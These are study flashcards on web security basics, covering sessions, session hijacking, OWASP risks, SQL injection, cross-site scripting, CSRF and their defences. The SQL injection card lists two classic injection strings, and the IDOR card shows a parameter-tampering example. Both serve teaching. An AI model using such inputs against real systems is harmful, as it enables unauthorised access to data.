6. Web Security Flashcards

1
Q

stateless HTTP

A

http request and response pairs is independent and has no memory. Does not know if user is already logged in

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

sessions

A
  1. data structure to store data only during time user is interacting with website
  2. used to manage states
  3. session data stored in server
  4. session id stored on client using cookies
  5. session id is passed to server to retrieve stored data
  6. when closed, lose session
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

session hijacking

A
  1. session starts when user logs in and return session id to user
  2. attacker steals the session id that will remain unchanged after authentication
  3. attacker is then able to hijack the session using the session id
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

GET vs POST

A

get is less secure as data can be found in URL

post is more secure as data is in body

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

OWASP top web security risks

A
  1. sql injection
  2. broken authentication
  3. sensitive data exposure
  4. broken access control
  5. security misconfiguration
  6. cross site scripting
  7. insecure direct object reference
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

sql injection

A

tricks server into executing wrong command
fred’ OR ‘1’=’1’
‘OR 1=1 –

problem
- allowing characters with special meaning

defense

  • prepared statements
  • stored procedures
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

broken authentication

A

error in implementation

  • what if user forget to logout
  • what if password is not hashed and salted
  • is the session id encrypted
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

cross site scripting

A
  1. reflected
    - non persistent
    - script passed using URL
    - trick the user to clicking
  2. stored
    - store script on server eg. forum
    - next user becomes the victim
  3. DOM based
    - crafts malicious code
    - trick victim to click the link and sends code to server
    - server wraps it with search template
    - server returns and execute real script
    - malicious code gets rendered

defense
- escape before inserting untrusted data

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

insecure direct object reference

A

unauthorised change in parameter value to refer to another user account
eg https://www.blablabla.com/customerID=1234 ->1233

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

security misconfiguration

A

can be misconfigured at many levels

  • not keeping software up to date
  • not patching vulnerabilities
  • using default user credentials

defence
- principle of least privilege

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

sensitive data exposure

A
  • database not protected adequately
  • data in database not encrypted
  • SQLI, sniffing, rainbow tables

defence

  • encrypt data
  • store password that is salted and hashed
  • apply access control
  • employee training and awareness
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

missing function level access control

A

function fulfilled without checking o user privileges

defence

  • don’t show function that user not allowed to use
  • principle of least privilege
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

cross site request forgery

A

trick user to execute undesired action when they are already authenticated

  • depends on the privilege of the user
  • requires social engineering

defence

  • use challenge tokens
  • for sensitive operations, include challenge token in request. Server checks token to ensure request is valid
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

using components with known vulnerabilities

A

defence

  • keep components up to date
  • evaluate vulnerabilities before using
  • keep track of attack surface(3rd party software that you are not sure about)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

unvalidated redirect

A

defence

  • avoid links
  • have user confirm redirect
  • white list of redirects
How well did you know this?
1
Not at all
2
3
4
5
Perfectly